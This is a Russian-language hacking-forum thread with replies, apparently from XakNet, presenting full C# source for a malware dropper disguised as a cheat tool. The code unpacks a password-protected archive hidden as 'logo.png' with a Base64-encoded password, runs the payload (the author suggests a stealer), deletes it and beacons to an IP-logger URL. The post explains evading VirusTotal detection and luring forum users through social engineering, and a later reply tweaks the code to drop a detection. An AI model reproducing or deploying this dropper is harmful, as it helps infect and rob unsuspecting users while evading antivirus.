C# Распространяем малварь не боясь слива на ВТ, пусть сливают а нам срать! Статья v2.0

CYBER

.:Главный злодей:.
Admins
Регистрация
7 Янв 2018
Сообщения
724
Реакции
1,010
Депозит
2457$
Это продолжение моей статьи Распростроняем exe фейком читов. (легкая схема) Но уже более усовершенствованная тема.

Расскажу я вам сегодня как троянить различные форумы где могут взять ваш exe и слить на Virustotal, а нам это не надо? или все да-ки похер?

Но суть темы будет такая, что мы будем распространять вирусняк который пусть хоть засливаются и детектов не будет
Я сказочник скажете вы? Но в каждой сказке есть доля правды и сегодня я это докажу и выложу исходники на C#.


Что у нас будет:
1.Фейковый exe (охеренно чистый) его можно сливать на ВТ и не чего не будет
А не будет потому что этот exe запускает наш вирусняк
Сразу вы задаетесь вопросом, ок сольют твой вирусняк вместо формы
Обьясняю: сам вирус в zip архиве под паролем и выглядеть будет как logo.png да же расширение будет как у картинки.
Так же если ваш вирусняк в архиве будет с бешенным детектом, он не будет палиться пока не нажать кнопку в самой форме которая его от туда достанет, вить он под паролем который знает только форма.
И так суть вроде как понятна, давайте посмотрим как все это будет выглядеть в одной папки:



А так выглядит наш софт который разархивирует exe и запустит его:


Как вы догадались форму с кнопкой можно сделать любую, под любую тематику.

Например я недавно троянил школо-форум такой вот формой:

4f4ecb80d09fe2d5b2deeddba0d5bc18.jpg

Фантазия, смекалка, и не много СИ, в итоге вы получаете хороший профит и загрузки!

Переходим к написанию софта
Определимся что должна уметь наша форма:
1. Распаковать ахив под паролем, а пароль должен быть уже вшит в форму и желательно закодирован.
2. Достать из архива а точнее из файла logo.png не меняя его расширение сам exe
3. Запустить exe дождаться завершения его работы
4. Удалить exe что бы не палить, а атк же удалять если закрыли форму.
5. Ну и на последок прикрутим IPlogger что бы знать кто нажал на кнопку в форме.

Как вы уже поняли, сама по себе форма БЕЗВРЕДНА! И ее можно сливать на ВТ них*я не будет.
Если кто то поймет что наш вирус вшит в архив, а точнее поймет что под logo.png скрывается архив а в нем вирус, то опять же он под паролем...который знает только наша форма...снова ВТ сосет.
Единственный минус, нам придется распространять софт в zip архиве со всеми файлами под видом переносной версии.



Переходим к коду

Создаем проект:


Добавляем NuGet пакеты
  • SharpZipLib - Для распаковки zip
  • Fody - Что бы не таскать с сабой dll SharpZipLib вошьет его в саму форму
Как добавлять пакеты NuGet читаем в гугле инфы море и просто.

Кидаем на форму кнопку, или сразу делаем красивую форму под вашу тематику, например мего чит!

И обязательно 1 кнопка должна быть.



Кликаем 2 раза на кнопку и удаляем все что тама есть, что бы не морочится и не епать мозги.

И вставляем вот это:

Код для батоны формы:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.IO;
using ICSharpCode.SharpZipLib.Core;
using ICSharpCode.SharpZipLib.Zip;
using System.Threading;
using System.Net;
using System.Diagnostics;
using System.Reflection;


namespace unzip
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void button2_Click(object sender, EventArgs e)
        {


            new Thread(() =>
            {
                try
                {
                    string password = Encoding.ASCII.GetString(Convert.FromBase64String("Y2luc291bHMhIQ==")); // Ваш пароль закодированный в Base64 кодируем тут: https://xaknet.org/crypt/algorithm/base64-encode
                    if (!Directory.Exists(@".\update\font")) //Куда распаковать exe
                        Directory.CreateDirectory(@".\patch\font"); //Создать директорию если нет
                    ExtractZipFile(@".\update\logo.png", password, @".\update\font"); //Распакуем архив (как вы поняли logo.png это и есть архив)

                    System.Diagnostics.Process proc = System.Diagnostics.Process.Start(@".\update\font\logo.exe"); //Запускаем exe
             
                    proc.WaitForExit();
                    File.Delete(@".\update\font\logo.exe"); //Удаляем exe
                    Logger.Get("https://maper.info/X7Njw"); //Отстукиваем на IPlogger

                }
                catch (Exception)
                {
             
                }
            }).Start();

        }



        private void ExtractZipFile(string archiveFilenameIn, string password, string outFolder)
        {
            ZipFile zf = null;
            try
            {
                FileStream fs = File.OpenRead(archiveFilenameIn);
                zf = new ZipFile(fs);
                if (!String.IsNullOrEmpty(password))
                {
                    zf.Password = password;
                }
                foreach (ZipEntry zipEntry in zf)
                {
                    if (!zipEntry.IsFile)
                    {
                        continue;
                    }
                    String entryFileName = zipEntry.Name;


                    byte[] buffer = new byte[4096];
                    Stream zipStream = zf.GetInputStream(zipEntry);
                    String fullZipToPath = Path.Combine(outFolder, entryFileName);
                    string directoryName = Path.GetDirectoryName(fullZipToPath);
                    if (directoryName.Length > 0)
                        Directory.CreateDirectory(directoryName);


                    using (FileStream streamWriter = File.Create(fullZipToPath))
                    {
                        StreamUtils.Copy(zipStream, streamWriter, buffer);
                    }
                }
            }
            catch (Exception ex)
            {
                throw ex;
            }
            finally
            {
                if (zf != null)
                {
                    zf.IsStreamOwner = true;
                    zf.Close();
                }
            }
        }

        private class Logger
        {
            public static string Get(string url)
            {
                try
                {
                    WebRequest webRequest = WebRequest.Create(url);
                    webRequest.Credentials = CredentialCache.DefaultCredentials;
                    webRequest.Headers.Add("Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3");
                    ((HttpWebRequest)webRequest).UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";
                    return new StreamReader(webRequest.GetResponse().GetResponseStream()).ReadToEnd();


                }
                catch (Exception)
                {
                    return null;
                }

            }
        }




    }

}
Нам будет важна только эта часть, я постарался закоментить все строки:




Меняем папки/расширения если надо на свое, не забываем что пароль от архива должен быть обязательно закодирован в Base64
Кодируем пароль тут: https://xaknet.org/crypt/algorithm/base64-encode

И компилим все это.

Создаем архив с нужным паролем вам, кидаем туда exe стиллера или любой другой малвари (обязательно учтите название exe у меня в архиве по примеру на скрине выше лежал файл с названием logo.exe)

Теперь еще раз пройдемся что будет делать наша форма:

Берет файл logo.png > вводит пароль предварительно расшифровывая его из base64 в нормальный вид > кидает файл logo.exe в папке \update\font если ее нет то создаст > запускает > ждут когда завершит работу > удаляет > отстукивает на IPlogger.


Вот так вот можно спрятать ваш реальный стилак от сливов на ВТ.
Всем спасибо.

Статья писалась мной (C)CYBER XakNet.ORG
 
Последнее редактирование:

ROX

Провожу сделки
Гарант форума
Регистрация
18 Янв 2018
Сообщения
695
Реакции
1,783
Идея супер, до сих пор полный фуд)
 

jess_hide

Новичек
Регистрация
5 Май 2019
Сообщения
2
Реакции
0
круто, как этому научиться?
 
OP
OP
CYBER

CYBER

.:Главный злодей:.
Admins
Регистрация
7 Янв 2018
Сообщения
724
Реакции
1,010
Депозит
2457$
Убрал хайд! Наслаждайтесь!
 
OP
OP
CYBER

CYBER

.:Главный злодей:.
Admins
Регистрация
7 Янв 2018
Сообщения
724
Реакции
1,010
Депозит
2457$
Убираем детект 1 появился, якобы 60% что малварь. еще и какой то АВ беспонтовый и это спустя 3 месяца после слива слива на ВТ) всего 1 детект.



Уменьшаем строку запуска:
System.Diagnostics.Process proc = System.Diagnostics.Process.Start(@".\update\font\logo.exe"); //Запускаем exe
На это:
Process proc = Process.Start(@".\update\font\logo.exe"); //Запускаем exe малвари
 
  • Мне нравится
Реакции: ngix
Сверху